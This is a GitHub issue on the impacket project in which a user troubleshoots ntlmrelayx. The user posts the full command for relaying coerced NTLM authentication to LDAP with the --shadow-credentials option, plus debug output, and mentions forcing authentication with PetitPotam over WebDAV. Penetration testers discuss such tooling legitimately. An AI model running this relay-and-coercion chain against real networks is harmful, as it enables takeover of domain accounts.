fortra/impacket

ntlmrelayx does not seem to handle authentications

Muz1K1zuM opened this issue · 3 comments

Muz1K1zuM commented

Configuration

impacket version: Impacket v0.13.0.dev
Python version: Python 3.11.2
Target OS: Debian 6.1.37-1

Debug Output With Command String

sudo proxychains python3 ntlmrelayx.py -debug --http-port 8000 -t ldap://##.##.##.## --shadow-credentials
[proxychains] config file found: /etc/proxychains.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.17
Impacket v0.13.0.dev0+20240916.171021.65b774de - Copyright Fortra, LLC and its affiliated companies

[+] Impacket Library Installation Path: /usr/local/lib/python3.11/dist-packages/impacket-0.13.0.dev0+20240916.171021.65b774de-py3.11.egg/impacket
[] Protocol Client LDAPS loaded..
[] Protocol Client LDAP loaded..
[] Protocol Client DCSYNC loaded..
[] Protocol Client MSSQL loaded..
[] Protocol Client RPC loaded..
[] Protocol Client IMAP loaded..
[] Protocol Client IMAPS loaded..
[] Protocol Client SMB loaded..
[] Protocol Client SMTP loaded..
[] Protocol Client HTTPS loaded..
[] Protocol Client HTTP loaded..
[+] Protocol Attack SMB loaded..
[+] Protocol Attack HTTP loaded..
[+] Protocol Attack HTTPS loaded..
[+] Protocol Attack LDAP loaded..
[+] Protocol Attack LDAPS loaded..
[+] Protocol Attack MSSQL loaded..
[+] Protocol Attack IMAP loaded..
[+] Protocol Attack IMAPS loaded..
[+] Protocol Attack DCSYNC loaded..
[+] Protocol Attack RPC loaded..
[] Running in relay mode to single host
[] Setting up SMB Server on port 445
[] Setting up HTTP Server on port 8000
[] Setting up WCF Server on port 9389
[] Setting up RAW Server on port 6666
[*] Multirelay disabled

[] Servers started, waiting for connections
[] HTTPD(8000): Client requested path: /a/pipe/srvsvc
[] HTTPD(8000): Client requested path: /a/pipe/srvsvc
[] HTTPD(8000): Client requested path: /a/pipe/srvsvc
[*] HTTPD(8000): Client requested path: /a/pipe/srvsvc

Analyzing requests with Wireshark:
image

It seems that auth is not changing to NTLM.

Additional context

Not sure if it is an ntlmrelayx issue but, when I force an authentication though HTTP (Webdav), running PetitPotam, it seems that ntlmrelayx does not handle properly the ntlm authentication. Any clue about this?